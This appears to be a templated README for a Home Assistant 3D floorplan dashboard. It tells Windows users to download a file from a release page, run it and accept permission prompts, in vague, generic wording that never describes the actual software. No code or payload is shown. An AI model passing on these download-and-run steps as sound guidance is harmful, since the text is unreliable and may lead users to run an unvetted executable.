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3dash_webapp

Control Home Assistant in a browser with a 3D floorplan dashboard, live sensors, lights, and custom model mapping

🏠 3Dash_webapp - View Your Home in 3D

🚀 Getting Started

3Dash_webapp is a 3D floorplan dashboard for Home Assistant. It helps you see your home layout in a clear, visual way. You can use it on Windows to open the app and view your dashboard in a browser.

Use the link below to visit the download page and get the app:

Download 3Dash_webapp

📋 What You Need

Before you start, make sure your Windows PC meets these basic needs:

  • Windows 10 or Windows 11
  • A modern web browser such as Chrome, Edge, or Firefox
  • A stable internet connection
  • At least 4 GB of RAM
  • Enough free disk space for the app and saved settings

For the best experience, use a screen with good resolution. A larger screen helps when you view the floorplan and dashboard controls.

🖥️ What the App Does

3Dash_webapp gives you a 3D view of your home dashboard. It is made for people who want a simple visual way to check home status in Home Assistant.

Common uses include:

  • Viewing rooms and floors in a 3D layout
  • Checking lights, switches, and sensors
  • Moving between areas of the house
  • Opening Home Assistant controls from one view
  • Keeping a clean dashboard on a desktop or laptop

⬇️ Download and Run on Windows

Follow these steps on your Windows PC:

  1. Open the download page: 3Dash_webapp
  2. Look for the latest release or download option on the page
  3. Download the Windows version if one is listed
  4. Open your Downloads folder
  5. Find the file you downloaded
  6. Double-click the file to run it
  7. If Windows asks for permission, click Yes or Run
  8. Wait for the app to start
  9. Open the app in your browser if it launches there
  10. Keep the app open while you use your dashboard

If the download comes as a zip file, open the zip file first and then run the app file inside it.

🧭 First-Time Setup

After you start the app, you may need to set a few basic items before it works as you want.

  1. Open the app in your browser
  2. Enter your Home Assistant address
  3. Sign in with your Home Assistant account
  4. Choose the floorplan or room layout you want to use
  5. Save your settings
  6. Refresh the page if the dashboard does not load right away

If your dashboard uses a local Home Assistant server, make sure the server is on and reachable from your PC.

🎛️ How to Use 3Dash_webapp

Once the app is open, you can use it like this:

  • Click rooms or zones to see controls
  • Tap lights or switches to change them
  • Use the dashboard view to move through the home layout
  • Check sensor values from the room display
  • Open device controls when you need more detail

The layout is built to feel simple. You do not need to learn a lot of steps. Most actions happen with a click or tap.

🧱 Main Features

3Dash_webapp is set up to give you a clean home dashboard with useful visual controls.

  • 3D floorplan view for your home
  • Home Assistant support
  • Room-based navigation
  • Easy access to common device controls
  • Clean desktop-friendly interface
  • Works in a modern browser
  • Good fit for wall displays and home PCs

🔧 Basic Troubleshooting

If the app does not start or does not show your dashboard, try these steps:

  • Check that your internet connection works
  • Make sure Home Assistant is running
  • Refresh the browser page
  • Close the app and open it again
  • Try another browser like Edge or Chrome
  • Check that you entered the Home Assistant address correctly
  • Clear the browser cache if the page looks broken
  • Reboot your PC if the app still does not load

If you downloaded a zip file and nothing happens, make sure you extracted the files before opening the app.

🔐 Safe Use on Windows

When Windows asks for permission to open the file, review the prompt and allow it only if you downloaded it from the link above. Use a standard user account if you only need to view the dashboard. Keep your Home Assistant login details private.

📁 Typical File Layout

After download, you may see files like these:

  • An app file to start the dashboard
  • A config file for settings
  • A folder for assets or images
  • A folder for saved data
  • A readme file with extra details

Do not move files around unless the app instructions ask you to do so. Some apps need the files to stay in the same folder.

🛠️ Useful Setup Tips

  • Keep the app in one folder on your PC
  • Use a browser with hardware acceleration enabled if the 3D view feels slow
  • Set your screen to full screen for a cleaner wall-panel view
  • Save your Home Assistant login in the browser if you use the app often
  • Use a wired network if your dashboard loads slowly
  • Close extra tabs if the browser uses too much memory

❓ Common Questions

Can I use this without technical skills?

Yes. You only need to download the app, open it, and enter your Home Assistant details.

Does it work on a normal Windows PC?

Yes. A standard Windows laptop or desktop is enough for most users.

Do I need to code anything?

No. You can use the app through the browser and basic settings screens.

Can I use it for a wall display?

Yes. A wall display or spare monitor is a good fit for this kind of dashboard.

Will it work with my smart home setup?

If your setup uses Home Assistant, this app is built for that use case.

📌 Quick Start Checklist

  • Download the app from the GitHub page
  • Open the file on Windows
  • Allow it if Windows asks for permission
  • Open the app in your browser
  • Sign in to Home Assistant
  • Pick your floorplan or dashboard view
  • Save the settings
  • Use the dashboard to control your home

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